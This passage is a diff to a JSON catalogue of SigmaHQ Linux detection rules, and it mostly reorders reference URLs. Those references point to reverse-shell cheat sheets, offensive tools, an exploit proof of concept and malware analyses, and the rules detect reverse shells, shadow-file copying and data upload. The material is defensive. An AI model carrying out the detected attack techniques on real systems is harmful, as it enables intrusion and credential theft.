"linux", "refs": [ + "https://linux.die.net/man/8/useradd", "https://digital.nhs.uk/cyber-alerts/2018/cc-2825", "https://github.com/redcanaryco/atomic-red-team/blob/25acadc0b43a07125a8a5b599b28bbc1a91ffb06/atomics/T1136.001/T1136.001.md#atomic-test-5---create-a-new-user-in-linux-with-root-uid-and-gid", - "https://linux.die.net/man/8/useradd", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_privileged_user_creation.yml" ], "tags": [ @@ -96329,9 +96594,9 @@ "logsource.product": "linux", "refs": [ "https://artkond.com/2017/03/23/pivoting-guide/", - "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "http://pastebin.com/FtygZ1cg", "https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" ], "tags": [ @@ -96364,8 +96629,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", + "https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" ], "tags": [ @@ -96596,8 +96861,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/sshd_rules.xml", + "https://github.com/openssh/openssh-portable/blob/c483a5c0fb8e8b8915fad85c5f6113386a4341ca/ssherr.c", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/sshd/lnx_sshd_susp_ssh.yml" ], "tags": [ @@ -96773,10 +97038,10 @@ "logsource.category": "file_event", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml" ], "tags": [ @@ -96810,10 +97075,10 @@ "logsource.category": "file_event", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml" ], "tags": [ @@ -96926,8 +97191,8 @@ "logsource.category": "file_event", "logsource.product": "linux", "refs": [ - "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://research.splunk.com/endpoint/linux_doas_conf_file_creation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/file_event/file_event_lnx_doas_conf_creation.yml" ], "tags": [ @@ -97171,10 +97436,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup_susp_execution.yml" ], "tags": [ @@ -97288,8 +97553,8 @@ "logsource.product": "linux", "refs": [ "https://gtfobins.github.io/gtfobins/vimdiff/", - "https://gtfobins.github.io/gtfobins/vim/", "https://gtfobins.github.io/gtfobins/rvim/", + "https://gtfobins.github.io/gtfobins/vim/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_gtfobin_vim.yml" ], "tags": [ @@ -97322,10 +97587,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_script_exec_from_susp_location.yml" ], "tags": [ @@ -97423,10 +97688,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml" ], "tags": [ @@ -97525,10 +97790,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://sysdig.com/blog/mitre-defense-evasion-falco", - "https://linuxhint.com/uninstall_yum_package/", - "https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command", "https://linuxhint.com/uninstall-debian-packages/", + "https://linuxhint.com/uninstall_yum_package/", + "https://sysdig.com/blog/mitre-defense-evasion-falco", + "https://www.tutorialspoint.com/how-to-install-a-software-on-linux-using-yum-command", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_remove_package.yml" ], "tags": [ @@ -97637,14 +97902,14 @@ "logsource.product": "linux", "refs": [ "https://github.com/t3l3machus/Villain", - "https://github.com/Ne0nd0g/merlin", + "https://github.com/Pennyw0rth/NetExec/", "https://github.com/pathtofile/bad-bpf", - "https://github.com/1N3/Sn1per", "https://github.com/Gui774ume/ebpfkit", - "https://github.com/HavocFramework/Havoc", "https://github.com/carlospolop/PEASS-ng", "https://github.com/t3l3machus/hoaxshell", - "https://github.com/Pennyw0rth/NetExec/", + "https://github.com/1N3/Sn1per", + "https://github.com/Ne0nd0g/merlin", + "https://github.com/HavocFramework/Havoc", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_hktl_execution.yml" ], "tags": [ @@ -97745,9 +98010,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://www.cyberciti.biz/tips/linux-iptables-how-to-flush-all-rules.html", + "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_iptables_flush_ufw.yml" ], "tags": [ @@ -97780,8 +98045,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_perl_reverse_shell.yml" ], "tags": [ @@ -97847,8 +98112,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_xterm_reverse_shell.yml" ], "tags": [ @@ -97882,8 +98147,8 @@ "logsource.product": "linux", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file", - "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://medium.com/@petehouston/upload-files-with-curl-93064dcccc76", + "https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html", "https://curl.se/docs/manpage.html", "https://twitter.com/d1r4c/status/1279042657508081664", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_curl_fileupload.yml" @@ -97926,8 +98191,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml" ], "tags": [ @@ -97984,8 +98249,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://linux.die.net/man/8/userdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_userdel.yml" @@ -98053,8 +98318,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/Tib3rius/AutoRecon", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/Tib3rius/AutoRecon", "https://github.com/projectdiscovery/naabu", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_network_utilities_execution.yml" ], @@ -98188,8 +98453,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk", "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", + "https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml" ], "tags": [ @@ -98313,10 +98578,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", - "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html", + "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_kill.yml" ], "tags": [ @@ -98339,10 +98604,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_shell_child_process_from_parent_tmp_folder.yml" ], "tags": [ @@ -98365,8 +98630,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", + "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_disable_ufw.yml" ], "tags": [ @@ -98466,8 +98731,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_python_reverse_shell.yml" ], "tags": [ @@ -98557,8 +98822,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_recon.yml" ], "tags": [ @@ -98591,10 +98856,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml" ], "tags": [ @@ -98661,8 +98926,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_php_reverse_shell.yml" ], "tags": [ @@ -98737,8 +99002,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", "https://github.com/arget13/DDexec", + "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_base64_execution.yml" ], "tags": [ @@ -98804,8 +99069,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://www.cyberciti.biz/faq/linux-remove-user-command/", + "https://linuxize.com/post/how-to-delete-group-in-linux/", "https://www.cybrary.it/blog/0p3n/linux-commands-used-attackers/", "https://linux.die.net/man/8/groupdel", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_groupdel.yml" @@ -98874,8 +99139,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/carlospolop/PEASS-ng", "https://github.com/diego-treitos/linux-smart-enumeration", + "https://github.com/carlospolop/PEASS-ng", "https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml" ], @@ -98976,8 +99241,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_system.html", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_system_discovery.yml" ], "tags": [ @@ -99018,8 +99283,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/", "https://github.com/AonCyberLabs/Cexigua/blob/34d338620afae4c6335ba8d8d499e1d7d3d5d7b5/overwrite.sh", + "https://www.aon.com/cyber-solutions/aon_cyber_labs/linux-based-inter-process-code-injection-without-ptrace2/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_dd_process_injection.yml" ], "tags": [ @@ -99052,8 +99317,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", + "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_touch_susp.yml" ], "tags": [ @@ -99128,9 +99393,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://linux.die.net/man/1/bash", "https://www.revshells.com/", - "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml" ], "tags": [ @@ -99153,8 +99418,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", + "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml" ], "tags": [ @@ -99210,10 +99475,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", - "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_vm.html", + "https://www.trendmicro.com/en_us/research/22/e/new-linux-based-ransomware-cheerscrypt-targets-exsi-devices.html", "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_vm_discovery.yml" ], "tags": [ @@ -99287,8 +99552,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html", "https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html", + "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_storage.html", "https://www.trendmicro.com/en_us/research/22/a/analysis-and-Impact-of-lockbit-ransomwares-first-linux-and-vmware-esxi-variant.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_storage_discovery.yml" ], @@ -99330,8 +99595,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://developer.vmware.com/docs/11743/esxi-7-0-esxcli-command-reference/namespace/esxcli_network.html", + "https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_esxcli_network_discovery.yml" ], "tags": [ @@ -99406,8 +99671,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", + "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_inod_listing.yml" ], "tags": [ @@ -99593,9 +99858,9 @@ "refs": [ "https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/", "https://man7.org/linux/man-pages/man1/ncat.1.html", + "https://www.infosecademy.com/netcat-reverse-shells/", "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", - "https://www.infosecademy.com/netcat-reverse-shells/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_netcat_reverse_shell.yml" ], "tags": [ @@ -99628,9 +99893,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.computerhope.com/unix/unohup.htm", "https://gtfobins.github.io/gtfobins/nohup/", "https://en.wikipedia.org/wiki/Nohup", - "https://www.computerhope.com/unix/unohup.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_nohup.yml" ], "tags": [ @@ -99719,8 +99984,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk", "https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally", + "https://dev.to/0xbf/use-mkfifo-to-create-named-pipe-linux-tips-5bbk", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation_susp_location.yml" ], "tags": [ @@ -99820,8 +100085,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", + "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_dockerenv_recon.yml" ], "tags": [ @@ -99887,9 +100152,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html", "https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/", "https://bpftrace.org/", - "https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml" ], "tags": [ @@ -99946,8 +100211,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", + "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_ssm_agent_abuse.yml" ], @@ -100006,8 +100271,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://blog.skyplabs.net/posts/container-detection/", + "https://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_container_residence_discovery.yml" ], "tags": [ @@ -100040,9 +100305,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://blogs.blackberry.com/", "https://www.cyberciti.biz/faq/linux-hide-processes-from-other-users/", + "https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_mount_hidepid.yml" ], "tags": [ @@ -100075,10 +100340,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_wget_download_suspicious_directory.yml" ], "tags": [ @@ -100111,8 +100376,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://research.splunk.com/endpoint/linux_doas_tool_execution/", "https://www.makeuseof.com/how-to-install-and-use-doas/", + "https://research.splunk.com/endpoint/linux_doas_tool_execution/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_doas_execution.yml" ], "tags": [ @@ -100145,8 +100410,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/sleventyeleven/linuxprivchecker/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_susp_history_delete.yml" ], "tags": [ @@ -100245,8 +100510,8 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://attack.mitre.org/techniques/T1548/001/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_setgid_setuid.yml" ], "tags": [ @@ -100279,9 +100544,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ - "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/apache/spark/pull/36315/files", "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html", + "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_cve_2022_33891_spark_shell_command_injection.yml" ], "tags": [ @@ -100315,9 +100580,9 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/process_creation/proc_creation_lnx_malware_gobrat_grep_payload_discovery.yml" ], "tags": [ @@ -100350,10 +100615,10 @@ "logsource.category": "process_creation", "logsource.product": "linux", "refs": [ + "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", "https://blogs.jpcert.or.jp/en/2023/05/gobrat.html", "https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection", "https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/", - "https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection", 